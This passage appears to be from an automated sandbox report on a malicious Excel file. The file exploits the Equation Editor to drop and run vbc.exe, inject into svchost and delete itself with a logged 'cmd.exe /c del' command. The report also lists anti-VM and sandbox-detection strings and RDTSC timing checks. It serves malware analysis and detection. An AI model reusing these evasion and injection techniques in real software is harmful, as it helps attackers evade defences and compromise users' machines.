          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC286D
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BAC85C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BA29B2
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BB69FE
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C4098E
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C25955
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C53A83
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C2DBDA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C4CBA4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9FBD7
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BC7B00
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00C3FDDD
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BD0D3B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BACD5B
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BD2E2F
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BBEE4C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00BB0F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092E0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0095D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0094905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00933040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092E2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009D1238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009563DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092F3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00932305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00937353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0097A37B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00965485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00941489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0094C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0093351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00934680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0093E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009D2622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009B579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0093C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009657C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009CF8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0093C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0095286D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009D098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009329B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009469FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009B5955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009E3A83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009DCBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009BDBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092FBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00957B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009CFDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00960D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0093CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00962E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0094EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00940F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0095DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009C14C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009D330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B8DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00088C6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00088C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009CE9E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0099F970 appears 81 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00973F92 appears 108 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0097373B appears 238 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0092E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0092DF5C appears 106 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B9DF5C appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B9E2A8 appears 37 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BE3F92 appears 108 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00BE373B appears 229 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00C0F970 appears 79 times
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004185B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418660 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004186E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418790 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004185AA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041865A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004186DF NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041878D NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B90078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B90048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B910D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B90060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B901D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B91148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B91930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B90C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B91D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B8FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00920048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00920078 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00920060 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_009201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00921148 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00921930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00920C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00921D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0091FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000985B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00098660 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000986E0 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00098790 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000985AA NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009865A NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_000986DF NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009878D NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E90000 page execute and read and write
          Source: vbc[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: RPM.xlsxVirustotal: Detection: 32%
          Source: RPM.xlsxReversingLabs: Detection: 28%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RPM.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREDB8.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/12@7/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
          Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514238693.0000000000030000.00000040.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: vbc[1].exe.4.dr, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: vbc.exe.4.dr, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.vbc.exe.2a0000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.vbc.exe.2a0000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 7.2.vbc.exe.2a0000.1.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418846 pushad ; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B85C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415184 pushfd ; iretd
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041CC51 push edx; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041547D push es; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00415DCA push 118C2D45h; retf
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B7F2 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B7FB push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0041B7A5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B9DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0092DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00095184 pushfd ; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009547D push es; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B7A5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B7FB push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B7F2 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00098846 pushad ; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009B85C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0009CC51 push edx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00095DCA push 118C2D45h; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.30848087754
          Source: initial sampleStatic PE information: section name: .text entropy: 7.30848087754
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3064, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2788Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3060Thread sleep time: -31326s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2992Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1528Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 31326
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.502403681.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmpBinary or memory string: vmware
